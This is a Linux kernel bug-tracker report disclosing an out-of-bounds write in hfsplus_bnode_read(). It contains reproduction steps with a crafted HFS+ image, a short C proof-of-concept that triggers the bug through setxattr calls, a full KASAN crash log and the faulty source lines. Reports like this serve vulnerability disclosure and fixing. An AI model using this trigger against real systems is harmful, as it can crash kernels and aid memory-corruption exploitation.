200293 – Out-of-bound access in hfsplus_bnode_read()

Bug 200293 - Out-of-bound access in hfsplus_bnode_read()

Summary: Out-of-bound access in hfsplus_bnode_read()

Status:	NEW

Alias:	None

Product:	File System
Classification:	Unclassified
Component:	HFS/HFSPLUS (show other bugs)
Hardware:	All Linux

Importance:	P1 normal
Assignee:	fs_hfs@kernel-bugs.osdl.org

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-06-27 03:53 UTC by Wen Xu
Modified:	2018-06-27 03:53 UTC (History)
CC List:	1 user (show)

See Also:
Kernel Version:	4.18
Subsystem:
Regression:	No
Bisected commit-id:

Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream) 2018-06-27 03:53 UTC, Wen Xu	Details
Add an attachment (proposed patch, testcase, etc.)

Description Wen Xu 2018-06-27 03:53:05 UTC

Created attachment 276895 [details]
The (compressed) crafted image which causes crash

- Reproduce (4.18)
# mkdir mnt
# mount -t hfsplus 8.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *xattr;

  int err;

  static int buf[8192];
  memset(buf, 0, sizeof(buf));

  err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);

  // xattr
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));
  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}

- Kernel message
[  925.089898] hfsplus: request for non-existent node 5888 in B*Tree
[  925.091299] hfsplus: request for non-existent node 5888 in B*Tree
[  925.092783] ==================================================================
[  925.094367] BUG: KASAN: slab-out-of-bounds in hfsplus_bnode_read+0xb1/0x140
[  925.095783] Write of size 3922 at addr ffff8801eff06400 by task a.out/1421

[  925.097521] CPU: 0 PID: 1421 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  925.097529] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  925.097535] Call Trace:
[  925.097573]  dump_stack+0x7b/0xb5
[  925.097610]  print_address_description+0x70/0x290
[  925.097616]  kasan_report+0x291/0x390
[  925.097620]  ? hfsplus_bnode_read+0xb1/0x140
[  925.097637]  check_memory_region+0x139/0x190
[  925.097641]  memcpy+0x37/0x50
[  925.097646]  hfsplus_bnode_read+0xb1/0x140
[  925.097652]  hfsplus_bnode_read_key+0xfb/0x140
[  925.097657]  ? hfsplus_bnode_read_u8+0xa0/0xa0
[  925.097679]  ? set_page_dirty+0x9c/0x120
[  925.097685]  ? hfsplus_bnode_write+0xc2/0x170
[  925.097690]  hfsplus_brec_insert+0x3e2/0x6c0
[  925.097696]  ? hfsplus_brec_keylen+0x130/0x130
[  925.097701]  ? __kmalloc+0x11f/0x240
[  925.097707]  hfsplus_create_attr+0x263/0x2b0
[  925.097712]  ? hfsplus_attr_exists+0x140/0x140
[  925.097720]  ? strncmp+0x3d/0xc0
[  925.097725]  __hfsplus_setxattr+0x2d5/0x1160
[  925.097757]  ? unwind_get_return_address+0x36/0x50
[  925.097763]  ? kasan_check_write+0x14/0x20
[  925.097790]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  925.097797]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  925.097802]  ? save_stack+0x46/0xd0
[  925.097805]  ? kasan_kmalloc+0xad/0xe0
[  925.097809]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.097814]  ? hfsplus_setxattr+0x4c/0xb0
[  925.097818]  ? hfsplus_user_setxattr+0x27/0x30
[  925.097831]  ? __vfs_setxattr+0x7c/0xa0
[  925.097835]  ? __vfs_setxattr_noperm+0x8d/0x200
[  925.097839]  ? vfs_setxattr+0xb3/0xc0
[  925.097846]  ? setxattr+0x1b3/0x260
[  925.097851]  ? path_setxattr+0x134/0x170
[  925.097855]  ? __x64_sys_setxattr+0x6d/0x80
[  925.097869]  ? do_syscall_64+0x78/0x170
[  925.097874]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.097879]  ? save_stack+0xb5/0xd0
[  925.097883]  ? save_stack+0x46/0xd0
[  925.097886]  ? kasan_kmalloc+0xad/0xe0
[  925.097890]  ? __kmalloc_node+0x11e/0x2e0
[  925.097903]  ? kvmalloc_node+0x31/0x80
[  925.097907]  ? setxattr+0x114/0x260
[  925.097911]  ? path_setxattr+0x134/0x170
[  925.097914]  ? __x64_sys_setxattr+0x6d/0x80
[  925.097918]  ? do_syscall_64+0x78/0x170
[  925.097923]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.097926]  ? save_stack+0xb5/0xd0
[  925.097930]  ? save_stack+0x46/0xd0
[  925.097933]  ? __kasan_slab_free+0x13c/0x1a0
[  925.097936]  ? kasan_slab_free+0xe/0x10
[  925.097940]  ? kmem_cache_free+0x89/0x1e0
[  925.097949]  ? putname+0x80/0x90
[  925.097953]  ? filename_lookup+0x191/0x280
[  925.097957]  ? kasan_unpoison_shadow+0x36/0x50
[  925.097961]  ? kasan_kmalloc+0xad/0xe0
[  925.097966]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.097972]  hfsplus_setxattr+0x8a/0xb0
[  925.097976]  hfsplus_user_setxattr+0x27/0x30
[  925.097980]  __vfs_setxattr+0x7c/0xa0
[  925.097985]  __vfs_setxattr_noperm+0x8d/0x200
[  925.097989]  vfs_setxattr+0xb3/0xc0
[  925.097994]  setxattr+0x1b3/0x260
[  925.097998]  ? vfs_setxattr+0xc0/0xc0
[  925.098001]  ? filename_lookup+0x191/0x280
[  925.098005]  ? filename_parentat+0x2b0/0x2b0
[  925.098010]  ? kasan_kmalloc+0xad/0xe0
[  925.098015]  ? kasan_check_write+0x14/0x20
[  925.098039]  ? strncpy_from_user+0xa8/0x1c0
[  925.098052]  ? __mnt_is_readonly.part.13+0x23/0x30
[  925.098057]  ? __mnt_want_write+0x9d/0xb0
[  925.098062]  path_setxattr+0x134/0x170
[  925.098066]  ? setxattr+0x260/0x260
[  925.098076]  ? vm_brk+0x20/0x20
[  925.098081]  __x64_sys_setxattr+0x6d/0x80
[  925.098086]  do_syscall_64+0x78/0x170
[  925.098091]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.098114] RIP: 0033:0x7f5b520391fa
[  925.098115] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  925.098177] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  925.098186] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa
[  925.098189] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080
[  925.098191] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000
[  925.098194] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  925.098196] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000

[  925.098546] Allocated by task 1421:
[  925.099280]  save_stack+0x46/0xd0
[  925.099284]  kasan_kmalloc+0xad/0xe0
[  925.099288]  __kmalloc+0x11f/0x240
[  925.099292]  hfsplus_find_init+0x54/0xc0
[  925.099296]  hfsplus_create_attr+0x10c/0x2b0
[  925.099300]  __hfsplus_setxattr+0x2d5/0x1160
[  925.099304]  hfsplus_setxattr+0x8a/0xb0
[  925.099308]  hfsplus_user_setxattr+0x27/0x30
[  925.099311]  __vfs_setxattr+0x7c/0xa0
[  925.099314]  __vfs_setxattr_noperm+0x8d/0x200
[  925.099318]  vfs_setxattr+0xb3/0xc0
[  925.099321]  setxattr+0x1b3/0x260
[  925.099324]  path_setxattr+0x134/0x170
[  925.099327]  __x64_sys_setxattr+0x6d/0x80
[  925.099331]  do_syscall_64+0x78/0x170
[  925.099336]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  925.099671] Freed by task 0:
[  925.100274] (stack is not available)

[  925.101346] The buggy address belongs to the object at ffff8801eff06400
                which belongs to the cache kmalloc-1024 of size 1024
[  925.103925] The buggy address is located 0 bytes inside of
                1024-byte region [ffff8801eff06400, ffff8801eff06800)
[  925.106280] The buggy address belongs to the page:
[  925.107281] page:ffffea0007bfc100 count:1 mapcount:0 mapping:ffff8801f6802c40 index:0x0 compound_mapcount: 0
[  925.109289] flags: 0x2ffff0000008100(slab|head)
[  925.110247] raw: 02ffff0000008100 dead000000000100 dead000000000200 ffff8801f6802c40
[  925.111811] raw: 0000000000000000 00000000800e000e 00000001ffffffff 0000000000000000
[  925.113374] page dumped because: kasan: bad access detected

[  925.114846] Memory state around the buggy address:
[  925.115822]  ffff8801eff06500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  925.117269]  ffff8801eff06580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  925.118738] >ffff8801eff06600: 00 00 00 fc fc fc fc fc fc fc fc fc fc fc fc fc
[  925.120199]                             ^
[  925.121025]  ffff8801eff06680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  925.122497]  ffff8801eff06700: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  925.123955] ==================================================================
[  925.125422] Disabling lock debugging due to kernel taint
[  925.125610] general protection fault: 0000 [#1] SMP KASAN PTI
[  925.126835] CPU: 0 PID: 1421 Comm: a.out Tainted: G    B             4.18.0-rc1+ #6
[  925.128393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  925.130438] RIP: 0010:__memcpy+0x12/0x20
[  925.131255] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  925.135067] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246
[  925.136131] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200
[  925.137577] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352
[  925.139034] RBP: ffff8801dfbff4b0 R08: 0000000000000006 R09: ffffed003dfe106a
[  925.140478] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352
[  925.141925] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0
[  925.143365] FS:  00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  925.144989] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  925.146163] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0
[  925.147611] Call Trace:
[  925.148133]  ? memcpy+0x45/0x50
[  925.148788]  hfsplus_bnode_read+0x129/0x140
[  925.149650]  hfsplus_bnode_read_key+0xfb/0x140
[  925.157205]  ? hfsplus_bnode_read_u8+0xa0/0xa0
[  925.158142]  ? set_page_dirty+0x9c/0x120
[  925.158961]  ? hfsplus_bnode_write+0xc2/0x170
[  925.159868]  hfsplus_brec_insert+0x3e2/0x6c0
[  925.160755]  ? hfsplus_brec_keylen+0x130/0x130
[  925.161676]  ? __kmalloc+0x11f/0x240
[  925.162433]  hfsplus_create_attr+0x263/0x2b0
[  925.163319]  ? hfsplus_attr_exists+0x140/0x140
[  925.164238]  ? strncmp+0x3d/0xc0
[  925.164914]  __hfsplus_setxattr+0x2d5/0x1160
[  925.165806]  ? unwind_get_return_address+0x36/0x50
[  925.166795]  ? kasan_check_write+0x14/0x20
[  925.167645]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  925.168579]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  925.169784]  ? save_stack+0x46/0xd0
[  925.170515]  ? kasan_kmalloc+0xad/0xe0
[  925.171299]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.172273]  ? hfsplus_setxattr+0x4c/0xb0
[  925.173107]  ? hfsplus_user_setxattr+0x27/0x30
[  925.174035]  ? __vfs_setxattr+0x7c/0xa0
[  925.174831]  ? __vfs_setxattr_noperm+0x8d/0x200
[  925.175766]  ? vfs_setxattr+0xb3/0xc0
[  925.176529]  ? setxattr+0x1b3/0x260
[  925.177256]  ? path_setxattr+0x134/0x170
[  925.178081]  ? __x64_sys_setxattr+0x6d/0x80
[  925.178950]  ? do_syscall_64+0x78/0x170
[  925.179751]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.180824]  ? save_stack+0xb5/0xd0
[  925.181552]  ? save_stack+0x46/0xd0
[  925.182292]  ? kasan_kmalloc+0xad/0xe0
[  925.183074]  ? __kmalloc_node+0x11e/0x2e0
[  925.183906]  ? kvmalloc_node+0x31/0x80
[  925.184688]  ? setxattr+0x114/0x260
[  925.185418]  ? path_setxattr+0x134/0x170
[  925.186244]  ? __x64_sys_setxattr+0x6d/0x80
[  925.187120]  ? do_syscall_64+0x78/0x170
[  925.187922]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.188996]  ? save_stack+0xb5/0xd0
[  925.189728]  ? save_stack+0x46/0xd0
[  925.190471]  ? __kasan_slab_free+0x13c/0x1a0
[  925.191349]  ? kasan_slab_free+0xe/0x10
[  925.192147]  ? kmem_cache_free+0x89/0x1e0
[  925.192978]  ? putname+0x80/0x90
[  925.193654]  ? filename_lookup+0x191/0x280
[  925.194515]  ? kasan_unpoison_shadow+0x36/0x50
[  925.195436]  ? kasan_kmalloc+0xad/0xe0
[  925.196221]  ? kmem_cache_alloc_trace+0x102/0x200
[  925.197194]  hfsplus_setxattr+0x8a/0xb0
[  925.198005]  hfsplus_user_setxattr+0x27/0x30
[  925.198892]  __vfs_setxattr+0x7c/0xa0
[  925.199659]  __vfs_setxattr_noperm+0x8d/0x200
[  925.200560]  vfs_setxattr+0xb3/0xc0
[  925.201294]  setxattr+0x1b3/0x260
[  925.202003]  ? vfs_setxattr+0xc0/0xc0
[  925.202769]  ? filename_lookup+0x191/0x280
[  925.203621]  ? filename_parentat+0x2b0/0x2b0
[  925.204509]  ? kasan_kmalloc+0xad/0xe0
[  925.205295]  ? kasan_check_write+0x14/0x20
[  925.206161]  ? strncpy_from_user+0xa8/0x1c0
[  925.207033]  ? __mnt_is_readonly.part.13+0x23/0x30
[  925.208023]  ? __mnt_want_write+0x9d/0xb0
[  925.208856]  path_setxattr+0x134/0x170
[  925.209636]  ? setxattr+0x260/0x260
[  925.210376]  ? vm_brk+0x20/0x20
[  925.211038]  __x64_sys_setxattr+0x6d/0x80
[  925.211877]  do_syscall_64+0x78/0x170
[  925.212644]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  925.213683] RIP: 0033:0x7f5b520391fa
[  925.214436] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  925.218313] RSP: 002b:00007ffcadce8fb8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  925.219855] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5b520391fa
[  925.221306] RDX: 00007ffcadce8fe0 RSI: 00000000004008a4 RDI: 0000000001e1b080
[  925.222769] RBP: 00007ffcadce9060 R08: 0000000000000001 R09: 0000000000000000
[  925.224223] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  925.225672] R13: 00007ffcadce9160 R14: 0000000000000000 R15: 0000000000000000
[  925.227149] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  925.237067] ---[ end trace 7f5a46c7478f1295 ]---
[  925.238062] RIP: 0010:__memcpy+0x12/0x20
[  925.238907] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  925.242813] RSP: 0018:ffff8801dfbff490 EFLAGS: 00010246
[  925.243896] RAX: ffff8801eff08352 RBX: 0000000000001000 RCX: 0000000000000200
[  925.245328] RDX: 0000000000000000 RSI: 580556c000016000 RDI: ffff8801eff08352
[  925.246855] RBP: ffff8801dfbff4b0 R08: 0000000000000006 R09: ffffed003dfe106a
[  925.248305] R10: 0000000000000006 R11: ffffed003dfe126a R12: ffff8801eff08352
[  925.249743] R13: 580556c000016000 R14: ffff8801eff08352 R15: 000000000000d7b0
[  925.251254] FS:  00007f5b52518700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  925.252904] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  925.254085] CR2: 0000000001e1b008 CR3: 00000001deb04000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L38
	while ((len -= l) != 0) {
		buf += l;
		l = min_t(int, len, PAGE_SIZE);
		memcpy(buf, kmap(*++pagep), l);
		kunmap(*pagep);
	}
OOB happens in this memcpy() as KASAN reports.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.

Note You need to log in before you can comment on or make changes to this bug.